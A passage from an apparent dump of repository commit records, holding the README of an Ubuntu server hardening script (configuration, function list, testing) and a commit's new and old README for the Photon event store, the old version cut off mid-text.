Ubuntu server a bit more secure.\n\nTested on `Ubuntu 20.04 Focal Fossa` and `Ubuntu 20.10 Groovy Gorilla (development branch)`.\n\nSystemd required.\n\nIf you're just interested in the security focused systemd configuration, it's\navailable as a link:systemd.adoc[separate document].\n\nIf you're interested in testing your host settings, you'll find the\nlink:README.adoc#tests[instructions here].\n\nNOTE: This is a constant work in progress. Make sure you understand what it\ndoes. `Read the code`.\n\n== Howto\nStart the installation of the server. +\nPick language, keyboard layout, timezone and so on as you usually would.\n\n=== Partition the system\n[source,shell]\n----\n\/\n\/boot (rw)\n\/home (rw,nosuid,nodev)\nswap\n\/var\n\/var\/log (rw,nosuid,nodev,noexec)\n\/var\/log\/audit (rw,nosuid,nodev,noexec)\n\/var\/tmp (rw,noexec,nodev,nosuid)\n----\n\nNote that `\/tmp` will be added automatically by the script.\n\n=== Login, set a Grub2 password, configure and run ubuntu.sh\nDo not add any packages. +\nLog in. +\nSelect a Grub2 password with `grub-mkpasswd-pbkdf2`. +\nDownload the script: `git clone https:\/\/github.com\/konstruktoid\/hardening.git`. 
+\nChange the configuration options in the `ubuntu.cfg` file. +\nRun the script: `sudo bash ubuntu.sh`. +\nReboot.\n\nIf possible, use the newly installed and configured system as a reference,\nor golden, image. Use that image as a baseline installation media and ensure\nthat any future installation comply with benchmarks and policies using a\nconfiguration management tool, e.g https:\/\/www.ansible.com\/[Ansible] or\nhttps:\/\/puppet.com\/[Puppet].\n\nIf you're using Ansible, a playbook with most of the functions in this script is\navailable in my Ansible repository https:\/\/github.com\/konstruktoid\/ansible-role-hardening[konstruktoid\/ansible-role-hardening].\n\n== Configuration options\n[source,shell]\n----\nFW_ADMIN='127.0.0.1' \/\/ <1>\nSSH_GRPS='sudo' \/\/ <2>\nSSH_PORT='22' \/\/ <3>\nSYSCTL_CONF='.\/misc\/sysctl.conf' \/\/ <4>\nAUDITD_MODE='1' \/\/ <5>\nAUDITD_RULES='.\/misc\/audit-base.rules .\/misc\/audit-aggressive.rules .\/misc\/audit-docker.rules' \/\/ <6>\nLOGROTATE_CONF='.\/misc\/logrotate.conf' \/\/ <7>\nNTPSERVERPOOL='0.ubuntu.pool.ntp.org 1.ubuntu.pool.ntp.org 2.ubuntu.pool.ntp.org 3.ubuntu.pool.ntp.org pool.ntp.org' \/\/ <8>\nTIMEDATECTL='' \/\/ <9>\nVERBOSE='N' \/\/ <10>\nAUTOFILL='N' \/\/ <11>\nCHANGEME='' \/\/ <12>\n\n# Configuration files\nADDUSER='\/etc\/adduser.conf'\nAUDITDCONF='\/etc\/audit\/auditd.conf'\nAUDITRULES='\/etc\/audit\/rules.d\/hardening.rules'\nCOMMONPASSWD='\/etc\/pam.d\/common-password'\nCOMMONACCOUNT='\/etc\/pam.d\/common-account'\nCOMMONAUTH='\/etc\/pam.d\/common-auth'\nCOREDUMPCONF='\/etc\/systemd\/coredump.conf'\nDEFAULTGRUB='\/etc\/default\/grub.d'\nDISABLEFS='\/etc\/modprobe.d\/disablefs.conf'\nDISABLEMOD='\/etc\/modprobe.d\/disablemod.conf'\nDISABLENET='\/etc\/modprobe.d\/disablenet.conf'\nJOURNALDCONF='\/etc\/systemd\/journald.conf'\nLIMITSCONF='\/etc\/security\/limits.conf'\nLOGINDCONF='\/etc\/systemd\/logind.conf'\nLOGINDEFS='\/etc\/login.defs'\nLOGROTATE='\/etc\/logrotate.conf'\nPAMLOGIN='\/etc\/pam.d\/login'\nRESOLVEDCONF='\/etc\/systemd\/resolved.conf'\nRKHUNTERCONF='\/etc\/default\/rkhunter'\nRSYSLOGCONF='\/etc\/rsyslog.conf'\nSECURITYACCESS='\/etc\/security\/access.conf'\nSSHFILE='\/etc\/ssh\/ssh_config'\nSSHDFILE='\/etc\/ssh\/sshd_config'\nSYSCTL='\/etc\/sysctl.conf'\nSYSTEMCONF='\/etc\/systemd\/system.conf'\nTIMESYNCD='\/etc\/systemd\/timesyncd.conf'\nUFWDEFAULT='\/etc\/default\/ufw'\nUSERADD='\/etc\/default\/useradd'\nUSERCONF='\/etc\/systemd\/user.conf'\n----\n<1> The IP addresses that will be able to connect with SSH, separated by spaces.\n<2> Which group the users have to be member of in order to acess via SSH, separated by spaces.\n<3> Configure SSH port.\n<4> Stricter sysctl settings.\n<5> Auditd failure mode. 
0=silent 1=printk 2=panic.\n<6> Auditd rules.\n<7> Logrotate settings.\n<8> NTP server pool.\n<9> Add a specific time zone or use the system default by leaving it empty.\n<10> Whether you want all the details or not.\n<11> Let the script guess the `FW_ADMIN` and `SSH_GRPS` settings.\n<12> Add something just to verify that you actually glanced at the code.\n\n== Functions\n\n=== Function list\n\n==== 01_pre\nSetup script, sets APT flags and permission checks.\n\n==== 02_firewall\nEnable `ufw`, use `\/etc\/sysctl.conf`, and allow port 22 from `$FW_ADMIN`.\n\n==== 03_disablenet\nDisable `dccp` `sctp` `rds` `tipc` protocols.\n\n==== 04_disablemnt\nDisable `cramfs` `freevxfs` `jffs2` `hfs` `hfsplus` `squashfs` `udf` `vfat` file\nsystems.\n\n==== 05_systemdconf\nDisable coredumps and crash shells, set `DefaultLimitNOFILE` and\n`DefaultLimitNPROC` to 1024.\n\n==== 06_journalctl\nCompress logs, forward to syslog and make log storage persistent. Ensure rsyslog\nwrites logs with stricter permissions.\n\n==== 07_timesyncd\nAdd four NTP servers with a latency < 50ms from `$NTPSERVERPOOL`.\n\n==== 08_fstab\nConfigure `\/tmp\/` and `\/var\/tmp\/`. Remove floppy drivers from `\/etc\/fstab`\nand add `hidepid=2` to `\/proc`.\n\n==== 09_prelink\nUndo prelinking, and remove the `prelink` package.\n\n==== 10_aptget\nConfigure `dpkg` and `apt-get`. `apt-get` update and upgrade.\n\n==== 11_hosts\n`\/etc\/hosts.allow` and `\/etc\/hosts.deny` restrictions.\n\n==== 12_logindefs\nModify `\/etc\/login.defs`, e.g. `UMASK`, password age limits and\n`SHA_CRYPT_MAX_ROUNDS`.\n\n==== 13_sysctl\nUpdate `$SYSCTL` with `$SYSCTL_CONF`.\n\n==== 14_limits\nSet hard and soft limits.\n\n==== 15_adduser\nSet `\/bin\/false` as default shell when adding users.\n\n==== 16_rootaccess\nLimit `\/etc\/securetty` to `console`, and `root` from 127.0.0.1 in\n`\/etc\/security\/access.conf`.\n\n==== 17_packages\nInstalls `acct` `aide-common` `apparmor-profiles` `apparmor-utils` `auditd`\n`audispd-plugins` `debsums` `gnupg2` `haveged` `libpam-apparmor`\n`libpam-cracklib` `libpam-tmpdir` `needrestart` `openssh-server` `postfix`\n`rkhunter` `sysstat` `systemd-coredump` `tcpd` `update-notifier-common`\n`vlock`.\n\nRemoves `apport*` `autofs` `avahi*` `beep` `git` `pastebinit`\n`popularity-contest` `rsh*` `rsync` `talk*` `telnet*` `tftp*` `whoopsie`\n`xinetd` `yp-tools` `ypbind`.\n\n==== 18_sshdconfig\nConfigure the `OpenSSH`-daemon.\n\n==== 19_password\nConfigure `pam_cracklib.so` and `pam_tally2.so`.\n\n==== 20_cron\nAllow `root` to use `cron`. 
Mask `atd`.\n\n==== 21_ctraltdel\nDisable Ctrl-alt-delete.\n\n==== 22_auditd\nConfigure `auditd`, use `$AUDITD_RULES` and set failure mode `$AUDITD_MODE`.\n\n==== 23_disablemod\nDisable `bluetooth` `bnep` `btusb` `cpia2` `firewire-core` `floppy` `n_hdlc`\n`net-pf-31` `pcspkr` `soundcore` `thunderbolt` `usb-midi` `usb-storage`\n`uvcvideo` `v4l2_common` kernel modules.\n\nNote that disabling the `usb-storage` module will disable any usage of USB storage\ndevices. If such devices are needed, `USBGuard` should be configured accordingly.\n\n==== 24_aide\nConfigure `aide`.\n\n==== 25_rhosts\nRemove `hosts.equiv` and `.rhosts`.\n\n==== 26_users\nRemove `games` `gnats` `irc` `list` `news` `sync` `uucp` users.\n\n==== 27_suid\nRemove `suid` bits from the executables listed in\nlink:misc\/suid.list[this document].\n\n==== 28_umask\nSet `bash` and `\/etc\/profile` umask.\n\n==== 29_apparmor\nEnforce present `apparmor` profiles.\n\n==== 30_path\nSet `root` path to `\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin`,\nand user path to `\/usr\/local\/bin:\/usr\/bin:\/bin`.\n\n==== 31_logindconf\nConfigure `systemd\/logind.conf` and use `KillUserProcesses`.\n\n==== 32_resolvedconf\nConfigure `systemd\/resolved.conf`.\n\n==== 33_rkhunter\nConfigure `rkhunter`.\n\n==== 34_issue\nUpdate `\/etc\/issue` `\/etc\/issue.net` `\/etc\/motd`.\n\n==== 35_apport\nDisable `apport`, `ubuntu-report` and `popularity-contest`.\n\n==== 36_lockroot\nLock the `root` user account.\n\n==== 37_coredump\nDisable coredumps with `systemd\/coredump.conf`.\n\n==== 38_postfix\nDisable the `VRFY` command, configure `smtpd_banner`, `smtpd_client_restrictions`\nand `inet_interfaces`.\n\n==== 39_motdnews\nDisable `motd-news`.\n\n==== 40_usbguard\nInstall and configure `usbguard`.\n\n==== 41_compilers\nRestrict compiler access.\n\n==== 42_kernel\nSet `lockdown=confidentiality` if `\/sys\/kernel\/security\/lockdown` is present.\n\n==== 43_sudo\nConfigure `sudo` `use_pty`, `logfile`, `!visiblepw`, `!pwfeedback` and\n`passwd_timeout`.\n\n==== 98_systemddelta\nIf verbose, show `systemd-delta`.\n\n==== 99_post\nEnsure `secureboot-db` is installed, update grub and ensure strict permissions\non boot files.\n\n==== 99_reboot\nPrint if a reboot is required.\n\n=== Function execution order\n[source,shell]\n----\nf_pre\nf_kernel\nf_firewall\nf_disablenet\nf_disablefs\nf_disablemod\nf_systemdconf\nf_resolvedconf\nf_logindconf\nf_journalctl\nf_timesyncd\nf_fstab\nf_prelink\nf_aptget_configure\nf_aptget\nf_hosts\nf_issue\nf_sudo\nf_logindefs\nf_sysctl\nf_limitsconf\nf_adduser\nf_rootaccess\nf_package_install\nf_coredump\nf_usbguard\nf_postfix\nf_apport\nf_motdnews\nf_rkhunter\nf_sshconfig\nf_sshdconfig\nf_password\nf_cron\nf_ctrlaltdel\nf_auditd\nf_aide\nf_rhosts\nf_users\nf_lockroot\nf_package_remove\nf_suid\nf_restrictcompilers\nf_umask\nf_path\nf_aa_enforce\nf_aide_post\nf_aide_timer\nf_aptget_noexec\nf_aptget_clean\nf_systemddelta\nf_post\nf_checkreboot\n----\n\n== Tests\nThere are approximately 700 https:\/\/github.com\/sstephenson\/bats[Bats tests]\nfor most of the above settings, available in the link:tests\/[tests directory].\n\n[source,shell]\n----\nsudo apt-get -y install bats\ngit clone https:\/\/github.com\/konstruktoid\/hardening.git\ncd hardening\/tests\/\nsudo bats .\n----\n\n=== Test automation using Vagrant\nRunning `bash .\/runTests.sh` will use https:\/\/www.vagrantup.com\/[Vagrant] to run\nall above tests and https:\/\/github.com\/CISOfy\/Lynis[Lynis] on all supported Ubuntu\nversions. 
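\n\nFor a sense of what an individual check looks like, here is a minimal\nstandalone Bats test in the style of the suite (a hypothetical example,\nnot one of the shipped tests):\n\n[source,shell]\n----\n#!\/usr\/bin\/env bats\n\n# Hypothetical check: IP forwarding should be disabled on a hardened host.\n@test \"net.ipv4.ip_forward is disabled\" {\n  run sysctl -n net.ipv4.ip_forward\n  [ \"$status\" -eq 0 ]\n  [ \"$output\" = \"0\" ]\n}\n----\n\nThe `runTests.sh` wrapper drives roughly 700 such checks on every supported release.\n\n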
The script will generate a file named `TESTRESULTS.adoc`.\n\n=== Testing a host\nRunning `bash .\/runHostTests.sh`, located in the link:tests\/[tests directory],\nwill generate a `TESTRESULTS-<HOSTNAME>.adoc` report.\n\n=== OpenSCAP testing\nTo run a https:\/\/github.com\/ComplianceAsCode\/content[OpenSCAP] test on an\nUbuntu host, where `v0.1.49` should be replaced with the latest available\nversion:\n\n[source,shell]\n----\nsudo apt-get -y install libopenscap8 unzip\nwget https:\/\/github.com\/ComplianceAsCode\/content\/releases\/download\/v0.1.49\/scap-security-guide-0.1.49-oval-510.zip\nunzip scap-security-guide-0.1.49-oval-510.zip\ncd scap-security-guide-0.1.49-oval-5.10\noscap info --fetch-remote-resources .\/ssg-ubuntu1804-ds.xml\nsudo oscap xccdf eval --fetch-remote-resources \\\n --profile xccdf_org.ssgproject.content_profile_anssi_np_nt28_high \\\n --report ..\/bionic_stig-report.html .\/ssg-ubuntu1804-ds.xml\n----\n\n== Recommended reading\nhttps:\/\/public.cyber.mil\/stigs\/downloads\/?_dl_facet_stigs=operating-systems%2Cunix-linux[Canonical Ubuntu 18.04 LTS STIG - Ver 1, Rel 1] +\nhttps:\/\/www.cisecurity.org\/benchmark\/distribution_independent_linux\/[CIS Distribution Independent Linux Benchmark] +\nhttps:\/\/www.cisecurity.org\/benchmark\/ubuntu_linux\/[CIS Ubuntu Linux Benchmark] +\nhttps:\/\/www.ncsc.gov.uk\/collection\/end-user-device-security\/platform-specific-guidance\/ubuntu-18-04-lts[EUD Security Guidance: Ubuntu 18.04 LTS] +\nhttps:\/\/public.cyber.mil\/stigs\/downloads\/?_dl_facet_stigs=operating-systems%2Cunix-linux[Red Hat Enterprise Linux 7 - Ver 2, Rel 3 STIG] +\nhttps:\/\/wiki.ubuntu.com\/Security\/Features +\nhttps:\/\/help.ubuntu.com\/community\/StricterDefaults\n\n== Contributing\nDo you want to contribute? That's great! Contributions are always welcome,\nno matter how large or small. If you find something odd, feel free to\nhttps:\/\/github.com\/konstruktoid\/hardening\/issues\/[submit a new issue],\nimprove the code by https:\/\/github.com\/konstruktoid\/hardening\/pulls[creating a pull request],\nor support the project by https:\/\/github.com\/sponsors\/konstruktoid[sponsoring it].\n\nLogo by https:\/\/github.com\/reallinfo[reallinfo].\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"32c4b62372b460953be75ec2e23894b99d34cd47","subject":"fixes #19","message":"fixes #19","repos":"microserviceux\/photon,microserviceux\/photon,microserviceux\/photon","old_file":"README.adoc","new_file":"README.adoc","new_contents":"# Photon Event Store\n\nPhoton is an event store with cold+hot event streaming.\n\nIn microservices, each service is supposed to take responsibility for a single functional capability: a computational process. In this context, these processes will follow the same pattern: gathering sequences of inputs and generating sequences of outputs through transformation functions, also called projections. Usually such functions are deeply coupled with both 1) the implementation of the service and 2) the data consumed to generate a current state and outputs. As a consequence, designs and implementations of the concepts of storage, sequence handling and data transformation have to be repeated over and over again across different services.\n\nPhoton is an attempt at avoiding such redundancy by abstracting and encapsulating both the storage and the transformation of data as service methods. 
It is designed as a black box with an internal database with a projection engine, both generic enough to store free-form data and allow for a wide range of expressivity for data transformation, in real time. In this way, business rules can be implemented and deployed in Photon instances via projections, effectively decoupling business logic and data storage and processing.\n\n## Quickstart\n\nDownload the link:https:\/\/github.com\/muoncore\/muon-starter[Muon Starter] repository and run through the instructions and\npre-requisites from there. The latest released version of photon will be started using Docker Compose,\nalong with a contained RabbitMQ instance for communication and other support microservices.\n\nInstall the link:https:\/\/github.com\/muoncore\/muon-cli[Muon CLI] and set up with the URL `amqp:\/\/muon:microservices@localhost`\n\nYou can then see photon running\n\n```bash\n> muon d\n\n\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\n\u2502 SERVICE NAME \u2502 TAGS \u2502 CONTENT\/TYPE \u2502\n\u251c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2524\n\u2502 molecule \u2502 \u2502 application\/json \u2502\n\u251c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2524\n\u2502 photon \u2502 photon,eventstore \u2502 application\/json \u2502\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\n```\n\nYou can emit an event using the CLI\n\n```bash\n> muon event '{ \"event-type\": \"SomethingHappened\", \"schema\": \"1\",\"stream-name\": \"something\",\"payload\": {\"message\": 
\"Hi there!\"}}'\n```\n\nThis will persist the event in the given stream. It can be replayed at any point later on.\n\nYou can replay the persisted events using the CLI\n\n```bash\n\n> muon replay something\n\n```\n\nAll the events stored will then be replayed.\n\n\nCheck the latest http:\/\/muoncore.io\/submodules\/photon\/doc\/index.html[photon documentation] for more information.\n\nCheck the http:\/\/muoncore.io\/guide\/index.html[Muon Guide] to see patterns for developing with events using Photon.\n\n## Developing Photon\n\n### Prerequisites\n\nYou will need https:\/\/github.com\/technomancy\/leiningen[Leiningen] 2.0.0 or above installed.\n\n### Running\n\nYou can run photon directly from the source:\n\n```\nlein do cljsbuild once, run\n```\n\nOr you can build an uberjar:\n\n```\nlein do cljsbuild once, uberjar\njava -jar photon-*-standalone.jar\n```\n\n### Admin Console\n\nOnce running, point your browser to: `http[s]:\/\/HOST:PORT\/index.html`. HOST and PORT can be configured as seen below.\n\n.Migration of UI\n****\nThis console will be migrated to the Molecule project once the Molecule plugin system is stable.\n****\n\n### Startup options\n\n```\nUsage: java -jar photon-x.x.x-standalone.jar [-h] [-option value] ... [-option value]\nOptions:\n-microservice.name : Service ID, especially important for Muon (default = photon)\n-rest.host : The IP or hostname of the web server for frontend and API. Change it for external access (default = localhost)\n-rest.port : The port for the UI frontend and the REST API\n-rest.keystore : If set, the web server will be started in SSL mode using the certificates identified by this path\n-rest.keypass : The password required to open the keystore set in rest.keystore. Not required in non-SSL mode\n-admin.user : The default username for logging in and requesting API tokens (default = admin)\n-admin.pass : The default password for logging in and requesting API tokens (default = p4010n)\n-admin.secret : A secret string that will be used to encode authentication tokens (default is random on launch)\n-projections.port : Port to stream projection updates to (default = 8375)\n-events.port : Port to stream incoming events to (default = 8376)\n-muon.url : AMQP endpoint for Muon-based transport and discovery (default = amqp:\/\/localhost)\n-parallel.projections : Number of cores assigned for parallel stream processing (default = number of cores on your machine)\n-projections.path : Local folder with projections, in EDN format, to pre-load on start (default = \/tmp\/photon)\n-db.backend : DB backend plugin to use (default=h2). Depending on the build of photon, this can be one of:\n h2, cassandra, redis, file, mongo, riak, dummy.\n-h2.path : If using H2, the file prefix for the database file, including path (default = \/tmp\/photon.h2)\n-cassandra.ip : If using Cassandra, the host of the cluster\n-file.path : If using files as the backend, the absolute path to the file\n-mongodb.host : If using MongoDB, the host of the cluster\n-riak.default_bucket : If using Riak, the name of the bucket\n-riak.node.X : If using Riak, the nodes that form the cluster (riak.node.1, riak.node.2, etc.)\n```\n\n### Setting up a file for static configuration\n\nPhoton can be configured either directly from the command line or from a file, and parameters can be combined from different sources. The order of priority in which the configuration is built is the following:\n\n1. Command-line arguments\n2. photon.properties in the working directory\n3. resources\/photon.properties\n4. 
resources\/config.properties\n\nExample of property file:\n\n```\n# Microservice identifier (default = photon):\nmicroservice.name=photon\n# AMQP endpoint (default = amqp:\/\/localhost):\nmuon.url=amqp:\/\/username:password@localhost\n# Number of cores assigned for parallel stream processing\n# (default = number of cores on your machine):\nparallel.projections=8\n# Local folder with projections, in EDN format, to pre-load on start\n# (default = \/tmp\/photon):\nfile.path=\/path\/to\/edn-files\/\n# DB backend plugin to use, several options currently available:\ndb.backend={file,mongodb,riak,cassandra}\n# Depending on the backend, you'll need to set up the DB plugin:\ncassandra.ip=127.0.0.1\nfile.path=\/path\/to\/file.json\nmongodb.host=localhost\nriak.default_bucket=photon-eventstore-v1\nriak.node.1=riak1.yourdomain.com\nriak.node.2=riak2.yourdomain.com\nriak.node.3=riak3.yourdomain.com\n```\n\n### Muon schemas\n\nThe endpoints and expected schemas to interact with `photon` can be found link:doc\/schemas.md[here].\n\n### Testing\n\nTests are run by executing\n\n```\nlein midje\n```\n\nTo run the test suite from the REPL:\n\n```bash\nlein repl\n=> (use 'midje.sweet)\n=> (autotest)\n```\n\nAlternatively, create a test photon client to interact with photon:\n\n```bash\nlein new muon-clojure photon-test-client\n```\n\n### Profiling\n\nIn order to achieve the best performance and throughput, photon has been intensively tested and profiled with the https:\/\/www.yourkit.com[YourKit] profiler, with a license kindly provided by their creators as part of their support to the open source community.\n\nimage:https:\/\/www.yourkit.com\/images\/yklogo.png[YourKit logo]\n\nYourKit supports open source projects with its full-featured Java Profiler.\nYourKit, LLC is the creator of https:\/\/www.yourkit.com\/java\/profiler\/index.jsp[YourKit Java Profiler]\nand https:\/\/www.yourkit.com\/.net\/profiler\/index.jsp[YourKit .NET Profiler],\ninnovative and intelligent tools for profiling Java and .NET applications.\n","old_contents":"# Photon Event Store\n\nPhoton is an event store with cold+hot event streaming.\n\nIn microservices, each service is supposed to take responsibility for a single functional capability: a computational process. In this context, these processes will follow the same pattern: gathering sequences of inputs and generating sequences of outputs through transformation functions, also called projections. Usually such functions are deeply coupled with both 1) the implementation of the service and 2) the data consumed to generate a current state and outputs. As a consequence, designs and implementations of the concepts of storage, sequence handling and data transformation have to be repeated over and over again across different services.\n\nPhoton is an attempt at avoiding such redundancy by abstracting and encapsulating both the storage and the transformation of data as service methods. It is designed as a black box with an internal database with a projection engine, both generic enough to store free-form data and allow for a wide range of expressivity for data transformation, in real time. In this way, business rules can be implemented and deployed in Photon instances via projections, effectively decoupling business logic and data storage and processing.\n\n## Quickstart\n\nDownload the link:https:\/\/github.com\/muoncore\/muon-starter[Muon Starter] repository and run through the instructions and\npre-requisites from there. 
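\n\nIn practice the setup amounts to something like the following sketch (the\nmuon-starter README is authoritative for the exact commands and compose layout):\n\n```bash\ngit clone https:\/\/github.com\/muoncore\/muon-starter\ncd muon-starter\ndocker-compose up -d\n```\n\n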
The latest released version of photon will be started using Docker Compose,\nalong with a contained RabbitMQ instance for communication and other support microservices.\n\nInstall the link:https:\/\/github.com\/muoncore\/muon-cli[Muon CLI] and set up with the URL `amqp:\/\/muon:microservices@localhost`\n\nYou can then see photon running\n\n```bash\n> muon d\n\n\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\n\u2502 SERVICE NAME \u2502 TAGS \u2502 CONTENT\/TYPE \u2502\n\u251c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2524\n\u2502 molecule \u2502 \u2502 application\/json \u2502\n\u251c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2524\n\u2502 photon \u2502 photon,eventstore \u2502 application\/json \u2502\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\n```\n\nYou can emit an event using the CLI\n\n```bash\n> muon event '{ \"event-type\": \"SomethingHappened\", \"schema\": \"1\",\"stream-name\": \"something\",\"payload\": {\"message\": \"Hi there!\"}}'\n```\n\nThis will persist the event in the given stream. 
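\n\nA stream usually holds more than one event before you replay it; emitting a\nsecond event with the same `stream-name` (reusing the command shape above)\ngives the replay below something more to show:\n\n```bash\n> muon event '{ \"event-type\": \"SomethingHappened\", \"schema\": \"1\",\"stream-name\": \"something\",\"payload\": {\"message\": \"Hi again!\"}}'\n```\n\n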
It can be replayed at any point later on\n\nYou can replay the persisted events using the CLI\n\n```bash\n\n> muon replay something\n\n```\n\nAll the events stored will then be replayed.\n\n\nCheck the latest http:\/\/muoncore.io\/submodules\/photon\/docs\/index.html[photon documentation] for more information.\n\nCheck the http:\/\/muoncore.io\/guide\/index.html[Muon Guide \"12 Days of Muon\"] to see patterns for developing with events using Photon\n\n## Developing Photon\n\n### Prerequisites\n\nYou will need [Leiningen][] 2.0.0 or above installed.\n\nhttps:\/\/github.com\/technomancy\/leiningen[leiningen]\n\n### Running\n\nYou can run photon directly from the source:\n\n```\nlein do cljsbuild once, run\n```\n\nOr you can build an uberjar:\n\n```\nlein do cljsbuild once, uberjar\njava -jar photon-*-standalone.jar\n```\n\n### Admin Console\n\nOnce running, point your browser to: `http[s]:\/\/HOST:PORT\/index.html`. HOST and PORT can be configured as seen below.\n\n.Migration of UI\n****\nThis console will be migrated to the Molecule project once the Molecule plugin system is stable.\n****\n\n### Startup options\n\n```\nUsage: java -jar photon-x.x.x-standalone.jar [-h] [-option value] ... [-option value]\nOptions:\n-microservice.name : Service ID, especially important for Muon (default = photon)\n-rest.host : The IP or hostname of the web server for frontend and API. Change it for external access (default = localhost)\n-rest.port : The port for the UI frontend and the REST API\n-rest.keystore : If set, the web server will be started in SSL mode using the certificates identified by this path\n-rest.keypass : The password required to open the keystore set in rest.keystore. Not required in not-SSL mode\n-admin.user : The default username for logging in and requesting API tokens (default = admin)\n-admin.pass : The default password for logging in and requesting API tokens (default = p4010n)\n-admin.secret : A secret string that will be used to encode authentication tokens (default is random on launch)\n-projections.port : Port to stream projection updates to (default = 8375)\n-events.port : Port to stream incoming events to (default = 8376)\n-muon.url : AMQP endpoint for Muon-based transport and discovery (default = 